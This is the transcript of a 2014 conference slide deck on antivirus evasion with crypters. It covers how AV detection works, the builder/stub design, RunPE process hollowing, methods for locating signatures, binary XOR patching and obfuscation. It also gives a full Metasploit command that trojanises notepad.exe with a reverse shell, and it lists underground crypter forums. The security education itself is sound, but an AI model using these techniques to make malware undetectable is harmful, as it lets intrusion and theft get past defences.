antivirus evasion techniques use of crypters 2k14 at mundohackerday
DESCRIPTION
AntiVirus Evasion Techniques Use of Crypters Presentation 2k14 at MundoHackerDay Congress Kevin Mitnick was also there ;)TRANSCRIPT
AntiVirus Evasion: Use of Crypters
Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14
Whoamincd:~ apasamar$ whoami apasamar [email protected] @apasamar a.k.a brajan ncd:~ apasamar$ cat apasamar.cv Electrical Engineer and Master in Information Security Co-founder of INCIDE: Electronic Evidence Experts Forensics / Expert Witness Reports Incident Response IT Security Auditors and Colsultants !ncd:~ apasamar$ rm apasamar.cv
what is this about...• Introduction
• AV’s how they work
• Malware types and AV detection
• Evasion techniques
• Auto-encryption, Polymorfism, Ofuscation, Compresion
• Crypters
• types
• stub
• stub FUD
• Modding techniques
• Resources
introduction
• MALWARE = $$$$$$$$$
• BOTNETS, APT, RANSOMWARE
• Empresas AV’s —> Detectar MALWARE
• Malos: INDETECTAR MALWARE
introduction
• MALWARE = $$$$$$$$$
• BOTNETS, APT, RANSOMWARE
• AV Companies —> MALWARE Detection
• BAD GUYS: Undetect MALWARE
introductionBad guys objective:
introductionBad guys objective:
AV howto• AntiVirus scan binaries on HARD DISC
• They do not SCAN MEMORY, only binaries that ‘start’ the running processes
• Scan for signatures: binary sequences @ AV DataBase
• Look for malicious tecniques (Heuristics): API’s, functions, XOR, etc
• Sandbox (partial execution):look for decryption routines, etc
AV howto
EJECUTABLE
DISCO
RAM
PRO
CES
O?
SCAN?
AV
AV howto• AV analysis process:
Atacs
AV howto
• Recomended:
“Abusing File Processing in Malware
Detectors for Fun and Profit” (2012)
Suman Jana and Vitaly Shmatikov
The University of Texas at Austin
AV howto• Metasploit Framework (Rapid7)
• Community Edition:
• msfpayload windows/shell/reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe
• Pro Edition:
• Generate AV-evading Dynamic Payloads
types of malware and AV detection
• Comercial SPY Programms: (white list, signed)
• e-blaster
• 007
• perfect keylogger
• …
• Malware newly created:
• LOW detection (NO known signatures)
• possible heuristic detections
types of malware and AV detection
• Existing Malware: (very well known, signature and heuristic detections)
• trojans (BiFrost, PoisonIvy,CyberGate, SpyNet, Darkcomet)
• downloaders
• passwords stealers
• reverse shells
types of malware and AV detection
How can we make undetectable malware already detected by AV?
• C r y p t e r s:
• Software allows you to encrypt ANY MALWARE doing it undetectable to AV.
crypters
builder / stub
• Builder:
• Is responsible for creating the NEW EXEcutable, composed of the STUB and the ENCRYPTED MALWARE
• Stub:
• Its mission is to decrypt and run the ENCRYPTED MALWARE
!!!!!!!!!
CRYPTER + STUB
STUB
DETECTED MALWARE
ENCRYPTED MALWARE
STUB
CRYPTER (Builder)
XOR, RC4, ...
exe dll
resource
builder / stub
STUB CRYPTED MALWARE
STUB CRYPTED MALWAREKEY
split
ter
split
ter
A resource section can always be used
builder / stub
• Crypters types:
• ScanTime
• RunTime
builder / stub
• ScanTime
STUB CRYPTED MALWARE DETECTED MALWARE
HARD DISC
AV
stub
• RunTime
STUB ENCRYPTED MALWARE
HARD DISC
RAM
DET
ECTE
D M
ALW
ARE
AV
stub
• STUB modules:
• Decrypt Routine
• RunPe (Dynamic Forking) Routine
!
stub
RunPE o Dynamic ForkingCreateProcess
PRO
CES
s 1
(CREATE_SUSPENDED)
GetThreadContext
PEB EBX
EAX
BaseAddress 1
EP I
+8
PRO
CES
S 2
ReadFile WriteProcessMemoryEP 2
BaseAddress 2
SetThreadContextResumeThread
FUD
• Target: FUD Stub (Full UnDetectable)
• From Source Code
• From Binary Code
• ¿How?
• MODDING
modding source code• Manually or using obfuscation tools:
• Function replacement (SPLIT,..)
• Funciones/strings/variables replacement and ofuscation. Use of rot13 or Hex encoding
• Encrytion: RC4 and XOR are very well known by AV
• Alternatives: TEA, DES, etc
• Alternative RunPE Routines
• Fake APIs
• TLB (Tab Library File)
• Trash code
• Techniques:
• Dsplit/AvFucker
• SignatureFucker
• Hexing
• RIT
• XOR and variants
• Tips
modding binary file
• We have to Undetect STUB, BUILDER is only a tool used at home, not in the wild
• First of all is to FIND AV SIGNATURES:
• Simple Signatures
• Multiple Signatures
• Heuristic Signatures
modding binary file
• Recomended:
“Bypassing Anti-Virus Scanners” (2012)
InterNOT Security Team
modding binary file
• ¿What if we use a simple Encrytion/Decrytion rutine inside the STUB?
stub.exe
EP
Signatures stub.exe
OLD EP
Signatures
NEW EP
Encrypted
Decrytion Rutine
modding binary file
• ORIGINAL STUB MULTIPLE AV SCAN
modding binary file
Do NOT use VirusTotal
for these Scans or your STUB samples
will be send to AV Companies :(
• ENCRYPTION ROUTINE
• NEW EP
• INSERT ROUTINE
• .text SECTION
• from offset 1050
• to Import Table
modding binary file
• ENCRYPTION ROUTINE AT NEW EP
• used only to encrypt .text section (used once)
Set breakpoint here, after encryption routine
modding binary file
• DECRYPTION AND EXECUTION AN NEW EP
modding binary file
• MODIFIED STUB MULTIPLE AV SCAN
16 AV’s KO
modding binary file
modding binary file• Techniques:
• Dsplit/AvFucker
• SignatureFucker
• Hexing
• RIT
• XOR and variants
• Tips
• DSplit:
Header EXE body
Header EXE body
1000 bytes
Header EXE body
2000 bytes
Header EXE body
3000 bytes
Header EXE body
··· Nx1000 bytes
modding binary file
• AvFucker:
EXE bodyHeader 0000000000
1000 bytes
Header EXE body0000000000
1000 bytes
Header Cuerpo EXE0000000000
1000 bytes
Header EXE body
···0000000000
1000 bytes
modding binary file
Header EXE body
• RIT Technique
• Find out AV Signature
• If Signture is located at instructions code —> break flow
• jump to another address (hole in section where yo can write your code)
• Execute pending instrucionts
• Return/jump to the appropriate instrucion
!
modding binary file
• XOR Tecnique
• Find out AV Signature
• Apply to a byte XOR with any value i.e. 22
• Modify EP or jump to your hole
• Apply XOR 22 to the modified byte
• Return/jump to the appropriate instrucion
modding binary file
Detected bytes (EP):
XOR of the detected bytes:
New EP ( XORs and jump to original EP):
modding binary file
other techniques
• Add Fake APIs
• Hex strings edit
• Move/change function calls
• Change funtion call type: by name/by offset
• Insert detected dll function into Stub Code
!
resources
• http://www.indetectables.net
• http://www.udtools.net
• http://www.masters-hackers.info
• http://www.level-23.biz/
• http://www.corp-51.net/
• http://www.underc0de.org
!
Avda. Diagonal, 640 6ª Planta
08017 Barcelona (Spain)
http://www.incide.es
http://www.twitter.com/1NC1D3
http://www.atrapadosporlosbits.com
http://www.youtube.com/incidetube
Companies > INCIDE - Investigación Digital
Tel./Fax. +34 932 546 277 / +34 932 546 314
A N Y Q U E S T I O N S ?